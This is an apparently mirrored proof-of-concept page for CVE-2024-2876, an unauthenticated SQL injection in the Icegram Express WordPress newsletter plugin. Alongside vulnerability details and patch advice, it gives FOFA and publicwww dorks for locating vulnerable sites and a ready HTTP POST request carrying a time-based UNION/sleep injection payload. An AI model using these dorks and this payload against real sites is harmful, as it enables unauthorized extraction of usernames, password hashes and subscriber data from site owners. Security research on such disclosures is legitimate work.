CVE-2024-2876 PoC — Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin <= 5.7.14 - Unauthenticated SQL Injecti

Source

https://github.com/0xlf/CVE-2024-2876

Associated Vulnerability

Title:Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin <= 5.7.14 - Unauthenticated SQL Injection (CVE-2024-2876)
Description:The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Readme

# CVE-2024-2876 - SQL Injection Vulnerability in Email Subscribers by Icegram Express

## Overview

CVE-2024-2876 is a critical security vulnerability found in the "Email Subscribers by Icegram Express" plugin for WordPress. This vulnerability affects versions up to and including 5.7.14 and poses significant risks to over 90,000 websites.

### Vulnerability Details

- **CVE-ID**: CVE-2024-2876
- **CVSS Score**: 9.8 (Critical)
- **Affected Versions**: Up to 5.7.14
- **Patched Version**: 5.7.15 and above

### Description

The vulnerability is a SQL injection flaw that allows unauthenticated attackers to execute malicious SQL queries on the affected WordPress databases. By manipulating user inputs that are not properly sanitized, attackers can extract sensitive information such as usernames, email addresses, password hashes, and subscriber lists.

### Exploit Mechanism

The SQL injection occurs within the `run` function of the plugin's `IG_ES_Subscribers_Query` class, where inadequate input validation leads to unauthorized SQL code execution. This compromises the integrity and confidentiality of the data stored in the WordPress database.


## Dorks CVE-2024-2876

- FOFA : body="/wp-content/plugins/email-subscribers/"

- publicwww : "/wp-content/plugins/email-subscribers/"

# POC CVE-2024-2876

```python
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```
## Recommendations

1. **Immediate Update**: If you are using the "Email Subscribers by Icegram Express" plugin, upgrade to version 5.7.15 or later immediately to apply the security fix.
   
2. **Regular Audits**: Regularly review and update all WordPress plugins and themes to their latest versions to ensure security.
   
3. **Security Plugins**: Use reputable WordPress security plugins to enhance defenses against SQL injection and other cyber threats.
   
4. **Strong Password Policies**: Implement strong and unique passwords for all accounts related to your WordPress site to reduce unauthorized access risks.

## Impact of Non-Compliance

Failing to update the affected plugin can leave websites vulnerable to data breaches and unauthorized access. Given the widespread use of this plugin, immediate action is crucial to secure installations.

File Snapshot


 [4.0K]  /data/pocs/9fda6460dd14956eac2d795c85a6c0c4a4ffd003
├── [ 842]  CVE-2024-2876.yaml
└── [2.5K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!